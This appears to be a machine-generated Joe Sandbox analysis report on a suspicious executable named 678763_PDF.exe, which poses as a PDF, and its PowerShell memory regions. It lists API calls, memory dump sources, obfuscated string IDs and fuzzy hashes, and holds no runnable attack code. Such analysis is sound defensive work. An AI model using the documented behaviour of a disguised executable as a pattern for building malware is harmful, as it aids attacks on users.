                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                                                                                                    • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                    • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 00405E78
                                                                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 00405E88
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                    • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                    • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l$4'^q$4'^q$4'^q$4'^q$4zl$4zl$x.nk$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-4210006951
                                                                                                                                                                                    • Opcode ID: 3c392e4e717951f24dddde8136b05c0a0529d61aadfa00e029b974568a4e1b00
                                                                                                                                                                                    • Instruction ID: 4a0df95e790c7eda17fc26e6894374996e2f68f3d45f1bee912b6d1603d27a02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c392e4e717951f24dddde8136b05c0a0529d61aadfa00e029b974568a4e1b00
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EA27D74A00318DFDB54CB18CE51FAABBB2AB85714F118199D9096F391CB72ED82CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$84{l$84{l$84{l$84{l$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2291183878
                                                                                                                                                                                    • Opcode ID: 0a0b269ab9f10812de0e3ce55fe720920a3744c744cbfea09705481483d11977
                                                                                                                                                                                    • Instruction ID: 56c5ed3629d2b088ecfcb0dd091e02b87b22a1e88fbda240d68a6fe1c89122ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0b269ab9f10812de0e3ce55fe720920a3744c744cbfea09705481483d11977
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A520630B00225DFCB14DF68D95066ABBE6FF84312F1484EAE9159B391DB32DD46CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l$4'^q$4'^q$4'^q$4'^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-4149900085
                                                                                                                                                                                    • Opcode ID: 7859b482b3aa9c2ba71f40d59b2930608805c0f63192597790d35b5465f1682e
                                                                                                                                                                                    • Instruction ID: 90d2dc900644be809966775bec89dbbb91028d570ab5da5e44750b0204438fc4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7859b482b3aa9c2ba71f40d59b2930608805c0f63192597790d35b5465f1682e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E19C70E002089FDB58DF68CA55B9FBBA3AF88314F159428D9056F395CB71EC46CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3199432138
                                                                                                                                                                                    • Opcode ID: 4b791c6b28f88fd032b4475958e58326deae90656a5d178747a2653db2cc085e
                                                                                                                                                                                    • Instruction ID: bc0d1eec56600b38c5a293ede5928820f0ec6c8f2a40df79c852262e2a1f2c7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b791c6b28f88fd032b4475958e58326deae90656a5d178747a2653db2cc085e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96A13531B043059FCFA88F68D6106BABBA3AF85234F14906ED855CF395DB31D986C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-1211429672
                                                                                                                                                                                    • Opcode ID: 596539f98caa3ef94bb7c9c5143d5db343c602018fb1837023396949db36e7f1
                                                                                                                                                                                    • Instruction ID: 527b55c51906f74e47c979f7c7285c92d60d605e2bd5c5d9d7989d0f6e23d0af
                                                                                                                                                                                    • Opcode Fuzzy Hash: 596539f98caa3ef94bb7c9c5143d5db343c602018fb1837023396949db36e7f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C726F70A003149FDB64CB58CA51FAABBB2FF84314F15C099D909AF355CB72ED868B91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l$4'^q$4'^q
                                                                                                                                                                                    • API String ID: 0-1177996258
                                                                                                                                                                                    • Opcode ID: 11b39a795229d2c47653e886c1d638c7aca8f56e61567a5b33dedcb56414d756
                                                                                                                                                                                    • Instruction ID: bd3c929ec52e2dc04aa12acc348b4df6214fd2ae44301f33d381987c6eeb4422
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11b39a795229d2c47653e886c1d638c7aca8f56e61567a5b33dedcb56414d756
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86325B74B012049FDB54CB98DA45F9ABBB2FF88324F158068E9059F365CB72EC46CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                    • API String ID: 0-1420252700
                                                                                                                                                                                    • Opcode ID: c643c1ab1fde33e190a8fd9f54d170ec3ec486829e7c6f095d52fc41f5a6fece
                                                                                                                                                                                    • Instruction ID: 2e7f75f3817dd128939617488e6711aa98887c7b9d8f4cf96b4c2cf94d7b3c1a
                                                                                                                                                                                    • Opcode Fuzzy Hash: c643c1ab1fde33e190a8fd9f54d170ec3ec486829e7c6f095d52fc41f5a6fece
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1125A31B143058FCB559B6C8A116AB7BA2AFC5324F14807EEA05DB391DB31DA47C7E2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$j$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-33150587
                                                                                                                                                                                    • Opcode ID: 659f4a68544f8509a7e214b31e2a0525526d66e7f7d9576c4f76a07f6103357f
                                                                                                                                                                                    • Instruction ID: f6b2bdd4b41537179ae9a4fe3597424b3001a598fa401e81e7e09cbbafa6be69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 659f4a68544f8509a7e214b31e2a0525526d66e7f7d9576c4f76a07f6103357f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C224F70A002149FDB64DB18C951F9ABBB2FF85314F15C099E909AF351CB72ED868FA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$4'^q$4zl$x.nk
                                                                                                                                                                                    • API String ID: 0-756057160
                                                                                                                                                                                    • Opcode ID: b4b2a850355681b83c462df05c96e27b6d61c2b7804119f5ea164c3f6f9ab769
                                                                                                                                                                                    • Instruction ID: 7c6448f56165f0926471ba777d0d81eaa0645df86d83e587873160118f38d248
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b2a850355681b83c462df05c96e27b6d61c2b7804119f5ea164c3f6f9ab769
                                                                                                                                                                                    • Instruction Fuzzy Hash: A5125F74A00314DFDBA0CB18CA41BAAB7B2BB85714F2591D9D50D6B351CB72ED82CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$4'^q$4zl$x.nk
                                                                                                                                                                                    • API String ID: 0-756057160
                                                                                                                                                                                    • Opcode ID: 00a3b766f7ae442205b95ded8b2bf23febb935087f98ac8baa3b2cc8806d30e3
                                                                                                                                                                                    • Instruction ID: 08e327f4fb99daf2c10fcdbc7e7423f1da81749c3e666046c5febc33174d9532
                                                                                                                                                                                    • Opcode Fuzzy Hash: 00a3b766f7ae442205b95ded8b2bf23febb935087f98ac8baa3b2cc8806d30e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7E14B74A00314DFDBA0CB14CA41BAAB7B2BB85714F2191D9D50DAB391CB72ED82CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-4129445936
                                                                                                                                                                                    • Opcode ID: 8213c422628d6f581bc2baebbcd73f094b9e7879d07f6168584d3a99b689c71f
                                                                                                                                                                                    • Instruction ID: 05b211a2ce0a31be58a9140546a9227b608daaf2c98030b9789aa5aa0afcd749
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8213c422628d6f581bc2baebbcd73f094b9e7879d07f6168584d3a99b689c71f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32523F74B002149FDB64DB18C951FAABBB2FB84314F15C099E909AF351CB72ED868F91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-4129445936
                                                                                                                                                                                    • Opcode ID: e4a05da8d78e98f4894ad58f9321dfcf7f33dbb91cd4f215d388ae99252922b8
                                                                                                                                                                                    • Instruction ID: de533fa2210282250a7e055b7cd8b36c75f8e1e6eeec137de7376ed597e8b1f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4a05da8d78e98f4894ad58f9321dfcf7f33dbb91cd4f215d388ae99252922b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F428F74B003149FC750DB18CE51FAABBA2AF89714F158199D9096F391CB72ED82CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.nk$-nk
                                                                                                                                                                                    • API String ID: 0-4129445936
                                                                                                                                                                                    • Opcode ID: 4df32de72b3d0bf72d471a2b071d78f5ecb2eebd235afad67f22e284d85e8f74
                                                                                                                                                                                    • Instruction ID: 9d74d1d77eb145204882f1481b86415c0081cb536ab22c2817ce154405ea031c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4df32de72b3d0bf72d471a2b071d78f5ecb2eebd235afad67f22e284d85e8f74
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31128E74B003149FCB50DB18CE51FAABBA2EB85704F118199E9096F391CB72ED82CF91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-831282457
                                                                                                                                                                                    • Opcode ID: 6fdcbb7a87c78abbd8e1b2726f54ece54e178c4441b7d90490c93c936174a8c1
                                                                                                                                                                                    • Instruction ID: 5fc06d0e0cac21ab15c8239c5d1af8b42795ccce8d1aa3c40e792bd177bf502a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdcbb7a87c78abbd8e1b2726f54ece54e178c4441b7d90490c93c936174a8c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB415732F003158FCBA45E699A406ABF7E5AF84620B24C92ED816DB345DF31DD06C7E1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-831282457
                                                                                                                                                                                    • Opcode ID: 5766ba77c5243d28665bb800812d7fd49491fac926699d6c47c0f1a1210f6f3f
                                                                                                                                                                                    • Instruction ID: 56c0ec9b8c2dc25b16dcbbc71a609d67749dd3bbd6da5b74c24afcb1da3c3f35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5766ba77c5243d28665bb800812d7fd49491fac926699d6c47c0f1a1210f6f3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD314831E043458FC7658B288A116ABBBF1AF85238B14906FC455CB292EA32E856C7E1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2291298209
                                                                                                                                                                                    • Opcode ID: cf6519779fc29fb487434eec49d04e8ba026a464ef0407a9ac5f9560d1d4c092
                                                                                                                                                                                    • Instruction ID: cde4b174bd7efe54ce42488b1cf80a145679cd67387b655c54d4136bb37d1ce2
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf6519779fc29fb487434eec49d04e8ba026a464ef0407a9ac5f9560d1d4c092
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A215B35E00326DFDB258E55C684A66B7E1EF44623F0480EED9089B225D731E889CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                                                                    • Opcode ID: f36d2431712ff92fdcb5dbf1c52a1fd315778718fd472fcabbd1875c5caa900e
                                                                                                                                                                                    • Instruction ID: 24bb9512e06a7b68d67a52d3a3e90ee202d107dd17d21dba0f1ce40eb2c4a068
                                                                                                                                                                                    • Opcode Fuzzy Hash: f36d2431712ff92fdcb5dbf1c52a1fd315778718fd472fcabbd1875c5caa900e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 57028C74B00304DFDB54CB58CA61E9ABBF2EF85324F158069E9059B3A5CB72EC46CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l
                                                                                                                                                                                    • API String ID: 0-4163203244
                                                                                                                                                                                    • Opcode ID: 76b9a173b9ef2586789d8a09442b30f6641309d43c1e3301dc0802f11a30721a
                                                                                                                                                                                    • Instruction ID: 933490b3584dd5fa009786a517de419a589e5ee417380a185b4d37e30ec1ea0c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 76b9a173b9ef2586789d8a09442b30f6641309d43c1e3301dc0802f11a30721a
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3917D70B002049FDB54DF98C741EAABBF2AF89324F159169D805AF355CB72ED42CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156268646.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b30000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l$(f}l
                                                                                                                                                                                    • API String ID: 0-4163203244
                                                                                                                                                                                    • Opcode ID: 2647243bcedc63e0953599eac635fed7f1c289b860f0ef559950abdc798a1fca
                                                                                                                                                                                    • Instruction ID: 869cda2fc9979c6368aac83381ac0f7e53e1ad438bfefac6a67305d1f43f8a1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2647243bcedc63e0953599eac635fed7f1c289b860f0ef559950abdc798a1fca
